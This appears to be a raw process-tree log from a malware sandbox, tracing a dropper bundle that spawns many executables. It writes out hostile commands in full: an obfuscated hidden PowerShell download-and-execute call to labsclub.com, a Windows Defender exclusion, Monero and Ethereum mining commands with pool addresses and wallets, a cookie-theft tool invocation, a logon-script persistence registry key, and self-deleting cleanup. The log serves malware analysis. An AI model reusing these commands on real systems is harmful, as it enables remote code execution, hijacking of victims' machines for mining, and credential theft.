C:\Users\Admin\AppData\Local\Temp\qxuef0ruhs5\vict.exe"C:\Users\Admin\AppData\Local\Temp\qxuef0ruhs5\vict.exe" /VERYSILENT /id=53520⤵PID:9652
-
C:\Users\Admin\AppData\Local\Temp\is-V1FOT.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-V1FOT.tmp\vict.tmp" /SL5="$404D2,870426,780800,C:\Users\Admin\AppData\Local\Temp\qxuef0ruhs5\vict.exe" /VERYSILENT /id=53521⤵PID:6872
-
C:\Users\Admin\AppData\Local\Temp\is-06CEJ.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-06CEJ.tmp\win1host.exe" 53522⤵PID:656
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3zuipgb55h0\1npmtp54rzm.exe"C:\Users\Admin\AppData\Local\Temp\3zuipgb55h0\1npmtp54rzm.exe" /ustwo INSTALL20⤵PID:9640
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "1npmtp54rzm.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\3zuipgb55h0\1npmtp54rzm.exe" & exit21⤵PID:8124
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "1npmtp54rzm.exe" /f22⤵
- Kills process with taskkill
PID:5468
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gfssno2sf2x\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\gfssno2sf2x\Setup3310.exe" /Verysilent /subid=57720⤵PID:9632
-
-
C:\Users\Admin\AppData\Local\Temp\h5j3cpp31uf\app.exe"C:\Users\Admin\AppData\Local\Temp\h5j3cpp31uf\app.exe" /8-2320⤵PID:9624
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\AI1VB44XQC\setups.exe"C:\Users\Admin\AppData\Local\Temp\AI1VB44XQC\setups.exe" ll17⤵PID:5916
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6b-585b4-827-0278a-43c71cb5f0bd8\Rashesodaely.exe"C:\Users\Admin\AppData\Local\Temp\6b-585b4-827-0278a-43c71cb5f0bd8\Rashesodaely.exe"14⤵PID:4280
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵PID:6020
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵PID:4180
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵
- Checks whether UAC is enabled
- Modifies registry class
PID:4428
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵PID:6048
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:5996
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵PID:5376
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"11⤵PID:3204
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:5700
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"11⤵PID:5160
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"12⤵PID:4508
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"12⤵PID:6440
-
C:\Users\Admin\Videos\lilal.exe"C:\Users\Admin\Videos\lilal.exe"13⤵PID:9016
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"14⤵PID:6660
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Dir.mui14⤵PID:9076
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe15⤵PID:8104
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 6440 C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"13⤵PID:6468
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 644014⤵
- Kills process with taskkill
PID:892
-
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 314⤵PID:8636
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵PID:4340
-
C:\Users\Admin\AppData\Local\Temp\Z0EU3H9VKI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Z0EU3H9VKI\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵PID:5544
-
C:\Users\Admin\AppData\Local\Temp\Z0EU3H9VKI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Z0EU3H9VKI\multitimer.exe" 1 3.1617432480.60680fa0da84b 10313⤵PID:2064
-
C:\Users\Admin\AppData\Local\Temp\Z0EU3H9VKI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Z0EU3H9VKI\multitimer.exe" 2 3.1617432480.60680fa0da84b14⤵PID:5548
-
C:\Users\Admin\AppData\Local\Temp\tibmdhuf1ku\jkfympbgygy.exe"C:\Users\Admin\AppData\Local\Temp\tibmdhuf1ku\jkfympbgygy.exe" /ustwo INSTALL15⤵PID:6636
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "jkfympbgygy.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\tibmdhuf1ku\jkfympbgygy.exe" & exit16⤵PID:8024
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "jkfympbgygy.exe" /f17⤵
- Kills process with taskkill
PID:8008
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bwvgwudpa0o\vpn.exe"C:\Users\Admin\AppData\Local\Temp\bwvgwudpa0o\vpn.exe" /silent /subid=48215⤵PID:6712
-
C:\Users\Admin\AppData\Local\Temp\is-P5VG1.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-P5VG1.tmp\vpn.tmp" /SL5="$20424,15170975,270336,C:\Users\Admin\AppData\Local\Temp\bwvgwudpa0o\vpn.exe" /silent /subid=48216⤵PID:7056
-
-
-
C:\Users\Admin\AppData\Local\Temp\z3f0ipaiq1k\app.exe"C:\Users\Admin\AppData\Local\Temp\z3f0ipaiq1k\app.exe" /8-2315⤵PID:6688
-
-
C:\Users\Admin\AppData\Local\Temp\ujjr5if0oni\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\ujjr5if0oni\cpyrix.exe" /VERYSILENT15⤵PID:6676
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe16⤵PID:4312
-
C:\Users\Admin\AppData\Local\Temp\4fef1278-25c0-422c-9921-e8012c72468f\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\4fef1278-25c0-422c-9921-e8012c72468f\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\4fef1278-25c0-422c-9921-e8012c72468f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run17⤵PID:4868
-
C:\Users\Admin\AppData\Local\Temp\4fef1278-25c0-422c-9921-e8012c72468f\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\4fef1278-25c0-422c-9921-e8012c72468f\AdvancedRun.exe" /SpecialRun 4101d8 486818⤵PID:4704
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force17⤵PID:7564
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 117⤵PID:7668
-
C:\Windows\SysWOW64\timeout.exetimeout 118⤵
- Delays execution with timeout.exe
PID:7648
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"17⤵PID:4752
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 161217⤵
- Program crash
PID:4452
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe16⤵PID:5248
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵PID:6404
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4h1ijecezyt\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\4h1ijecezyt\Setup3310.exe" /Verysilent /subid=57715⤵PID:6628
-
C:\Users\Admin\AppData\Local\Temp\is-NI8LH.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-NI8LH.tmp\Setup3310.tmp" /SL5="$9035A,138429,56832,C:\Users\Admin\AppData\Local\Temp\4h1ijecezyt\Setup3310.exe" /Verysilent /subid=57716⤵PID:6844
-
C:\Users\Admin\AppData\Local\Temp\is-1A78J.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-1A78J.tmp\Setup.exe" /Verysilent17⤵PID:5364
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rnynw1klbku\vict.exe"C:\Users\Admin\AppData\Local\Temp\rnynw1klbku\vict.exe" /VERYSILENT /id=53515⤵PID:6620
-
C:\Users\Admin\AppData\Local\Temp\is-OUR8D.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-OUR8D.tmp\vict.tmp" /SL5="$10404,870426,780800,C:\Users\Admin\AppData\Local\Temp\rnynw1klbku\vict.exe" /VERYSILENT /id=53516⤵PID:6952
-
C:\Users\Admin\AppData\Local\Temp\is-N2E93.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-N2E93.tmp\win1host.exe" 53517⤵PID:4772
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nbbbujxtqmz\hzf0aepxeaq.exe"C:\Users\Admin\AppData\Local\Temp\nbbbujxtqmz\hzf0aepxeaq.exe" /quiet SILENT=1 AF=75615⤵PID:6924
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\nbbbujxtqmz\hzf0aepxeaq.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\nbbbujxtqmz\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617173323 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"16⤵PID:7748
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DDBEZNPCBI\setups.exe"C:\Users\Admin\AppData\Local\Temp\DDBEZNPCBI\setups.exe" ll12⤵PID:4612
-
C:\Users\Admin\AppData\Local\Temp\is-P74U5.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-P74U5.tmp\setups.tmp" /SL5="$60308,635399,250368,C:\Users\Admin\AppData\Local\Temp\DDBEZNPCBI\setups.exe" ll13⤵PID:3900
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵PID:6088
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵PID:5972
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\tibml2jmbhk\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\tibml2jmbhk\KiffApp1.exe"8⤵PID:4540
-
-
C:\Users\Admin\AppData\Local\Temp\cx2tbp4zts0\ltam0qvkiqz.exe"C:\Users\Admin\AppData\Local\Temp\cx2tbp4zts0\ltam0qvkiqz.exe" /ustwo INSTALL8⤵PID:4568
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "ltam0qvkiqz.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\cx2tbp4zts0\ltam0qvkiqz.exe" & exit9⤵PID:6068
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "ltam0qvkiqz.exe" /f10⤵
- Kills process with taskkill
PID:4840
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\pr3hlgwo1fk\liu4npgvaww.exe"C:\Users\Admin\AppData\Local\Temp\pr3hlgwo1fk\liu4npgvaww.exe" /VERYSILENT8⤵PID:4352
-
C:\Users\Admin\AppData\Local\Temp\is-8833J.tmp\liu4npgvaww.tmp"C:\Users\Admin\AppData\Local\Temp\is-8833J.tmp\liu4npgvaww.tmp" /SL5="$40308,2592217,780800,C:\Users\Admin\AppData\Local\Temp\pr3hlgwo1fk\liu4npgvaww.exe" /VERYSILENT9⤵PID:4448
-
-
-
C:\Users\Admin\AppData\Local\Temp\p011pob0lx5\djlvga2zyuq.exe"C:\Users\Admin\AppData\Local\Temp\p011pob0lx5\djlvga2zyuq.exe"8⤵PID:4128
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\p011pob0lx5\djlvga2zyuq.exe"9⤵PID:2116
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:4320
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\r2izeuhuva5\vict.exe"C:\Users\Admin\AppData\Local\Temp\r2izeuhuva5\vict.exe" /VERYSILENT /id=5358⤵PID:4308
-
C:\Users\Admin\AppData\Local\Temp\is-9PA9V.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-9PA9V.tmp\vict.tmp" /SL5="$20252,870426,780800,C:\Users\Admin\AppData\Local\Temp\r2izeuhuva5\vict.exe" /VERYSILENT /id=5359⤵PID:4824
-
C:\Users\Admin\AppData\Local\Temp\is-R4CO9.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-R4CO9.tmp\win1host.exe" 53510⤵PID:4496
-
C:\Users\Admin\AppData\Local\Temp\D4jtFRYbw.exe"C:\Users\Admin\AppData\Local\Temp\D4jtFRYbw.exe"11⤵PID:1632
-
C:\Users\Admin\AppData\Local\Temp\D4jtFRYbw.exe"C:\Users\Admin\AppData\Local\Temp\D4jtFRYbw.exe"12⤵PID:4216
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 61211⤵
- Program crash
PID:9464
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fcnjnjftwga\vpn.exe"C:\Users\Admin\AppData\Local\Temp\fcnjnjftwga\vpn.exe" /silent /subid=4828⤵PID:4472
-
C:\Users\Admin\AppData\Local\Temp\is-K3J6J.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-K3J6J.tmp\vpn.tmp" /SL5="$30266,15170975,270336,C:\Users\Admin\AppData\Local\Temp\fcnjnjftwga\vpn.exe" /silent /subid=4829⤵PID:4680
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:5408
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:5880
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:5836
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:6524
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:11120
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:10896
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\qge1bu5x1pe\app.exe"C:\Users\Admin\AppData\Local\Temp\qge1bu5x1pe\app.exe" /8-238⤵PID:4228
-
-
C:\Users\Admin\AppData\Local\Temp\acu2xd4mz0z\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\acu2xd4mz0z\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:4464
-
-
C:\Users\Admin\AppData\Local\Temp\meex2zstena\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\meex2zstena\cpyrix.exe" /VERYSILENT8⤵PID:4132
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:5772
-
C:\Users\Admin\AppData\Local\Temp\8feb36a3-79f4-4545-9f18-e8ba92c5eaae\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\8feb36a3-79f4-4545-9f18-e8ba92c5eaae\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8feb36a3-79f4-4545-9f18-e8ba92c5eaae\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run10⤵PID:4480
-
C:\Users\Admin\AppData\Local\Temp\8feb36a3-79f4-4545-9f18-e8ba92c5eaae\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\8feb36a3-79f4-4545-9f18-e8ba92c5eaae\AdvancedRun.exe" /SpecialRun 4101d8 448011⤵PID:4520
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 110⤵PID:5060
-
C:\Windows\SysWOW64\timeout.exetimeout 111⤵
- Delays execution with timeout.exe
PID:836
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force10⤵PID:5300
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"10⤵PID:5864
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5772 -s 201210⤵
- Program crash
PID:4300
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:5832
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:6036
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\HD6LD44DBQ\setups.exe"C:\Users\Admin\AppData\Local\Temp\HD6LD44DBQ\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Users\Admin\AppData\Local\Temp\is-OJQSN.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-OJQSN.tmp\setups.tmp" /SL5="$4010C,635399,250368,C:\Users\Admin\AppData\Local\Temp\HD6LD44DBQ\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:964
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3428 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4212
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"4⤵PID:4708
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4780
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:4980
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:4852
-
C:\Users\Admin\AppData\Roaming\D69F.tmp.exe"C:\Users\Admin\AppData\Roaming\D69F.tmp.exe"5⤵PID:2560
-
C:\Users\Admin\AppData\Roaming\D69F.tmp.exe"C:\Users\Admin\AppData\Roaming\D69F.tmp.exe"6⤵PID:4736
-
-
-
C:\Users\Admin\AppData\Roaming\D7F8.tmp.exe"C:\Users\Admin\AppData\Roaming\D7F8.tmp.exe"5⤵PID:4220
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:4524
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:2020
-
-
-
C:\Users\Admin\AppData\Roaming\D8D3.tmp.exe"C:\Users\Admin\AppData\Roaming\D8D3.tmp.exe"5⤵PID:4796
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\D8D3.tmp.exe6⤵PID:5784
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:7072
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:3732
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:4240
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:4812
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:8120
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵PID:3516
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:5740
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:8224
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:972
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4140
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4428
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4500
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5084
-
C:\Users\Admin\AppData\Local\Temp\is-BGRQ9.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-BGRQ9.tmp\winlthsth.exe"1⤵PID:4144
-
C:\Users\Admin\AppData\Local\Temp\lilRhKoFA.exe"C:\Users\Admin\AppData\Local\Temp\lilRhKoFA.exe"2⤵PID:5012
-
C:\Users\Admin\AppData\Local\Temp\lilRhKoFA.exe"C:\Users\Admin\AppData\Local\Temp\lilRhKoFA.exe"3⤵PID:2904
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"2⤵PID:4108
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"3⤵PID:2840
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-20JMH.tmp\{app}\microsoft.cab -F:* %ProgramData%1⤵PID:4296
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-20JMH.tmp\{app}\microsoft.cab -F:* C:\ProgramData2⤵PID:1388
-
-
C:\Users\Admin\AppData\Local\Temp\is-U0M8V.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-U0M8V.tmp\IBInstaller_97039.tmp" /SL5="$10382,14574851,721408,C:\Users\Admin\AppData\Local\Temp\acu2xd4mz0z\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq1⤵PID:4672
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^¶m=2⤵PID:5932
-
-
C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"2⤵PID:5860
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f2⤵PID:8448
-
-
C:\Users\Admin\AppData\Local\Temp\is-20JMH.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-20JMH.tmp\{app}\chrome_proxy.exe"2⤵PID:3672
-
-
C:\Users\Admin\AppData\Local\Temp\is-ACP8B.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-ACP8B.tmp\lylal220.tmp" /SL5="$40300,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"1⤵PID:3848
-
C:\Users\Admin\AppData\Local\Temp\is-P14SK.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-P14SK.tmp\Microsoft.exe" /S /UID=lylal2202⤵PID:4412
-
C:\Program Files\Windows Portable Devices\DTFJGDQOIO\irecord.exe"C:\Program Files\Windows Portable Devices\DTFJGDQOIO\irecord.exe" /VERYSILENT3⤵PID:5140
-
